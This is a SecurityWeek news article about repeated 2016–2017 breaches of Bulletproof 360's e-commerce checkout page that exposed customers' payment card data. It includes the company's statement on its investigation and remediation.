Bulletproof Coffee Failed to Keep Hackers Out

Bulletproof 360, the Bellevue, Wash.-based company that offers Bulletproof coffee and dietary supplements, is having trouble keeping cybercriminals out of its systems. The firm has sent out several notifications in the past year informing customers that hackers may have obtained their personal and payment card information.

Bulletproof only has three physical stores in Seattle and Los Angeles, but many people buy the company’s products from its website, which appears to have been breached several times in the past year.

The company first discovered that hackers had broken into its website on February 23, 2017. An investigation revealed that cybercriminals had compromised Bulletproof’s e-commerce system and they may have obtained payment card data submitted by users who had made online purchases, including names, card numbers, expiration dates, and CVVs. The exposed data also included email addresses, physical addresses and phone numbers.

An initial investigation found that the hackers had access to Bulletproof’s systems from October 26, 2016 until January 31, 2017. However, the final forensics report revealed that the attackers actually had access until May 30, 2017, which triggered a second breach notification for the period between February and May 2017.

Bulletproof then initiated another internal investigation, which showed that hackers had compromised the checkout page on its website, bulletproof.com, in an effort to capture payment card data submitted by customers making online purchases. This time, the attackers appeared to have had access between August 28, 2017 and September 5, 2017.

In the notifications sent out on September 15, the company told customers that it had “implemented enhanced security measures, including installing a new website security platform, implementing a security information and event management system (SIEM), and implementing enhanced logging” in an effort to prevent future incidents.

However, the new security measures did not help much and this week Bulletproof started sending out a new round of data breach notifications. It turns out that cybercriminals may have also intercepted information submitted to the company via the checkout page on its website between May 20 and October 13, 2017, and October 15-19, 2017.

The company has promised to reimburse affected customers for costs incurred as a result of these breaches if their financial institution refuses to reimburse them. It remains to be seen if this is the last breach notice sent out by the company or if hackers will gain access to its systems once again – if they haven’t done so already.

UPDATE. Bulletproof has sent SecurityWeek the following statement:

We became aware of a security incident involving our ecommerce website after noticing unusual activity relating to customer online transactions. We then began an immediate investigation of our website, engaged three computer security firms to examine our systems for any signs of an issue, and notified law enforcement. Our investigation earlier determined that an unknown third party had compromised our e-commerce system, potentially affecting customer payment card information used for online transactions on Bulletproof’s e-commerce website from October 26, 2016 to May 30, 2017. Working with the security firms, we recently determined that payment card information used on our ecommerce website from October 26, 2016 through October 13, 2017 and from October 15-19, 2017 may have been compromised. We immediately removed the code and have notified potentially affected customers of the incident.

Protecting our customers’ information remains a top priority and we regret any inconvenience or concern this may cause our customers. We recognize the importance of protecting our customers’ payment card information. We are continuing to work with the three security firms to implement enhanced security measures to try to prevent a similar incident from happening in the future.

Eduard Kovacs is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.